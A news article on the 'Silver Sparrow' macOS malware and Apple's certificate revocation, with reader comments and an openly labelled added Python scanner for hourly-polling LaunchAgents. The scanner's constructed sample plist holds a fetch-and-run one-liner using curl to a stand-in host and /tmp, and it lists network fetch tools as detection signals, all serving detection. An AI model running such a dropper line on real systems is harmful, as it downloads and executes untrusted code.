Apple has taken steps to eradicate mysterious malware strain
Following the discovery of new and unusual malware able to run on Macs with Apple Silicon, Apple has moved to minimize any impact the maliciously crafted software could have in the future.
On Saturday, Red Canary researchers disclosed malware that uses an unusual attack vector to install itself on macOS. The activity cluster, which the researchers named "Silver Sparrow," is also an early example of malware able to run on Apple Silicon Macs.
More unusually, the malware appeared to be in development or a test rather than a fully realized threat, since it carried no malicious payload. It did, however, check for updates every hour, which would let its operator deliver such a payload later.
So far, no malicious payload appears to have been delivered, and it seems unlikely one is on the way anytime soon.
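The article says only that the malware polled for updates hourly, not how. As an added example that is not part of the article or of Red Canary's report, the scanner below looks for the usual macOS way to get that behaviour, a LaunchAgent with a fixed StartInterval that runs a shell one-liner fetching something over the network, and runs against two constructed sample plists. The tool names, temp-directory paths, sample labels and the two-signal threshold are assumptions chosen for illustration, not details taken from the page.

```python
"""Hunt for hourly-polling LaunchAgents.

Added example, not Red Canary's or Apple's code. The article says only that
the malware checked for updates hourly; this scanner ASSUMES the common macOS
implementation of that behaviour: a LaunchAgent with a fixed StartInterval
running a shell one-liner that fetches over the network. Tool names, paths,
thresholds and the sample plists below are constructed for illustration.
"""
import plistlib
import re
from pathlib import Path

# Interpreters a dropper typically chains in front of a fetch, and the fetchers.
LAUNCHERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
FETCHERS = {"curl", "wget", "nc"}
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
URL_RE = re.compile(r"https?://")
HOURLY_SECONDS = 3600


def analyze_agent(plist_bytes: bytes) -> list[str]:
    """Return the reasons a LaunchAgent plist looks like an update poller.

    An empty list means nothing notable was found. Each reason is a
    human-readable string so the output can go straight into a ticket.
    """
    try:
        agent = plistlib.loads(plist_bytes)
    except Exception:  # InvalidFileException, ExpatError, ...
        return ["unparseable plist"]
    if not isinstance(agent, dict):
        return ["plist root is not a dictionary"]

    reasons = []

    # 1. Fixed-interval polling at an hourly or faster cadence.
    interval = agent.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= HOURLY_SECONDS:
        reasons.append(f"fixed StartInterval of {interval}s (hourly or faster)")

    # Normalise Program / ProgramArguments into one flat token list.
    args = agent.get("ProgramArguments") or []
    if not args and "Program" in agent:
        args = [agent["Program"]]
    tokens = [t for t in re.split(r"\s+", " ".join(str(a) for a in args)) if t]
    basenames = {Path(t).name for t in tokens}

    # 2. An interpreter running a one-liner that reaches out to the network.
    fetches = bool(basenames & FETCHERS) or any(URL_RE.search(t) for t in tokens)
    if basenames & LAUNCHERS and fetches:
        reasons.append("interpreter invoked with a network fetch")

    # 3. Staging through a world-writable temp directory.
    if any(t.startswith(TEMP_DIRS) for t in tokens):
        reasons.append("references a world-writable temp directory")

    return reasons


def is_suspicious(reasons: list[str]) -> bool:
    """A lone hourly interval is normal (backups, sync); two or more signals is not."""
    return len(reasons) >= 2


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Analyze every *.plist in a LaunchAgents directory; return only the hits."""
    hits = {}
    for plist in sorted(directory.glob("*.plist")):
        reasons = analyze_agent(plist.read_bytes())
        if reasons:
            hits[str(plist)] = reasons
    return hits


# Constructed samples (not real artifacts): one poller, one ordinary backup job.
POLLER_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s https://updates.example.invalid/version.json -o /tmp/version.json; sh /tmp/agent.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

BACKUP_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup.sh</string></array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict></plist>
"""

if __name__ == "__main__":
    for sample in (POLLER_AGENT, BACKUP_AGENT):
        reasons = analyze_agent(sample)
        print("suspicious" if is_suspicious(reasons) else "ok", reasons)
    # On a real Mac, sweep the per-user and system LaunchAgents directories.
    for d in (Path.home() / "Library/LaunchAgents", Path("/Library/LaunchAgents")):
        if d.is_dir():
            for path, reasons in scan_launch_agents(d).items():
                print(path, reasons)
```

The two-signal threshold is deliberate: plenty of legitimate agents run on a fixed interval, so the interval alone only produces a note, while an interval combined with a shell-wrapped fetch or a temp-directory stage is what earns a closer look. Run it as a regular user to cover `~/Library/LaunchAgents`; `/Library/LaunchDaemons` would need the same treatment with root.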
Shortly after the publication of the malware details, Apple took steps to curtail the potential damage that Silver Sparrow could cause down the line.
An Apple spokesperson told AppleInsider that the company had already revoked the certificates of the developer accounts used to sign the malware's packages. Since macOS refuses to install packages signed with a revoked certificate, this effectively prevents new Macs from being infected and limits further spread.
Beyond certificate revocation, Apple noted that it also relies on hardware and software protections across its products and services, along with regular software updates, to keep such threats from having an impact.
While the Mac App Store is probably one of the safest places to acquire Mac software because of these protections, the spokesperson added that software obtained outside the Mac App Store is also safeguarded: Apple's Notary Service and other security mechanisms are used to detect malware and block it before it has a chance to run.
Comments
This was a bit of malware that contained a binary compiled for BOTH Intel AND ASi Macs. That's not really a reason to doomclaim that Apple's ASi Macs are somehow more at threat than Intel ones.
Apparently the technically illiterate media types assumed the M1 Macs are impervious to this and, Ha Ha Ha Ha, they're not. Apple has failed again!
But this is perfectly understandable considering Apple's constant virtue signaling regarding safety, security, privacy. When you pound your chest like Apple does you invite scrutiny and 'gotcha' journalism.
Obviously, the safest approach is to never download apps outside of the store and not click on clickbait. Still no one is perfect and a lot of users fall for tricks all the time.
I know Apple security updates eventually catch up to these types of threats, but it would be nice if they were working on ways to identify them as they turn up, or at least be able to scan for these items that do sneak in.
This one seems very sophisticated. It'll be interesting if they ever find out who was behind it and what the purpose was/is.
First, a significant new malware threat is worth knowing about. Second, because it's a new hardware platform, any malware threats coming out on the M1 are newsworthy in and of themselves.